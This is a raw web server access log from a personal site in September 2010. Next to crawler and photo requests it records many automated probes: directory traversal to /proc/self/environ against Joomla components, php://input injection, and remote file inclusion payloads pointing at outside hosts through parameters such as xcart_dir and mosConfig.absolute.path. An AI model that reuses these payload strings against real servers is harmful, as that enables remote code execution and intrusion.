76.13.230.12 - - [02/Sep/2010:09:00:03 -0700] "GET /retreat1_08898.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.11 - - [02/Sep/2010:09:00:04 -0700] "GET /retreat1_08899.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:04 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
76.13.230.13 - - [02/Sep/2010:09:00:05 -0700] "GET /retreat1_08901.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:09:00:06 -0700] "GET /retreat1_08907.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:09:00:07 -0700] "GET /retreat1_08910.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:09:00:08 -0700] "GET /retreat1_08913.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:08 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:08 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:08 -0700] "POST /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
76.13.230.13 - - [02/Sep/2010:09:00:08 -0700] "GET /retreat1_08918.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:08 -0700] "GET /logs/access_100610.log/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:10 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68508 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:12 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68511 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:13 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:00:14 -0700] "GET /logs/access_091230.log%20%20/bad_link.php?theme_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:09:00:15 -0700] "POST /logs/access_080316.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:18 -0700] "POST /index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 200 68409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:19 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:20 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:20 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:20 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:20 -0700] "POST /logs/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:00:20 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:00:59 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:01:02 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:01:07 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:01:07 -0700] "GET /logs/access_091213.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:01:10 -0700] "GET /logs/access_090527.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.16.237.166 - - [02/Sep/2010:09:01:25 -0700] "GET /logs/access_090203.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
69.16.237.166 - - [02/Sep/2010:09:01:25 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
69.16.237.166 - - [02/Sep/2010:09:01:25 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
69.16.237.166 - - [02/Sep/2010:09:01:43 -0700] "GET /logs/access_090201.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:02:10 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:02:10 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:02:10 -0700] "POST /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:09:02:10 -0700] "GET /logs/access_100611.log/index.php?option=com_bca-rss-syndicator&controller=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:02:15 -0700] "GET /logs/access_090815.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:02:19 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:02:19 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:02:19 -0700] "GET /logs/access_090316.log HTTP/1.0" 200 3606990 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:02:29 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:02:31 -0700] "GET /logs/access_081203.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:21 -0700] "GET /logs/access_100104.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:21 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:21 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:45 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:45 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
209.200.253.155 - - [02/Sep/2010:09:03:45 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:04:58 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:05:02 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:05:03 -0700] "GET /logs/access_081230.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:05:03 -0700] "GET /logs/access_090208.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:05:03 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:06:05 -0700] "GET /logs/access_091002.log////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:06:05 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167702 "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:06:06 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68551 "-" "Mozilla/5.0" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:06:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:06:10 -0700] "POST /logs/access_100410.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.90.166.51 - - [02/Sep/2010:09:06:10 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:35 -0700] "GET /logs/access_100104.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:35 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:35 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [02/Sep/2010:09:06:43 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:43 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:43 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:43 -0700] "GET /logs/access_100104.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:06:43 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:44 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:47 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:48 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:48 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:48 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:52 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:09:06:52 -0700] "POST /logs/access_091225.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:53 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:53 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:06:53 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:07:00 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:07:00 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.39.186 - - [02/Sep/2010:09:07:03 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:07:07 -0700] "GET /logs/access_091002.log////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:07:07 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167702 "-" "Mozilla/5.0" "www.dmulk.com"
78.38.150.61 - - [02/Sep/2010:09:07:08 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:09:07:10 -0700] "GET /logs/access_080224.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:07:19 -0700] "GET /logs/access_100601.log//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:07:19 -0700] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
75.127.98.12 - - [02/Sep/2010:09:07:22 -0700] "GET /logs//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:07:25 -0700] "GET /logs/access_100703.log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:07:27 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68478 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:09:07:28 -0700] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:07:47 -0700] "GET /logs/access_091213.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:07:49 -0700] "GET /admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:07:49 -0700] "GET /logs/access_090527.log//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:09:07:49 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
202.29.86.7 - - [02/Sep/2010:09:07:59 -0700] "GET /index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:21 -0700] "GET /bikes/GPS/?N=D HTTP/1.1" 200 954 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:21 -0700] "GET /bikes/WeSTOC08/dmulk_WeSTOC08_II.gdb HTTP/1.1" 200 746552 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:22 -0700] "GET /bikes/dteel/2008_07_03/?D=A HTTP/1.1" 200 851 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:22 -0700] "GET /bikes/WeSTOC08/dmulk_WeSTOC08_II.gpx HTTP/1.1" 200 2702746 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:22 -0700] "GET /bikes/dteel/2008_07_03/?M=A HTTP/1.1" 200 851 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:22 -0700] "GET /bikes/dteel/2008_07_03/?S=A HTTP/1.1" 200 851 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:24 -0700] "GET /megumi/sedona/2008-11-11/011.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:24 -0700] "GET /megumi/sedona/2008-11-11/012.CR2 HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:24 -0700] "GET /megumi/sedona/2008-11-11/013.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:26 -0700] "GET /megumi/sedona/2008-11-11/014.CR2 HTTP/1.1" 200 2752512 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:26 -0700] "GET /megumi/tambo/?D=A HTTP/1.1" 200 813 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:27 -0700] "GET /megumi/tambo/?M=A HTTP/1.1" 200 813 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:27 -0700] "GET /megumi/tambo/?N=A HTTP/1.1" 200 813 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:09:08:28 -0700] "GET /megumi/tambo/?S=A HTTP/1.1" 200 813 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:09:09:15 -0700] "GET /megumi/tambo/?S=A HTTP/1.0" 200 797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:09:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:09:22 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:09:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
207.46.13.84 - - [02/Sep/2010:09:09:25 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:09:09:53 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
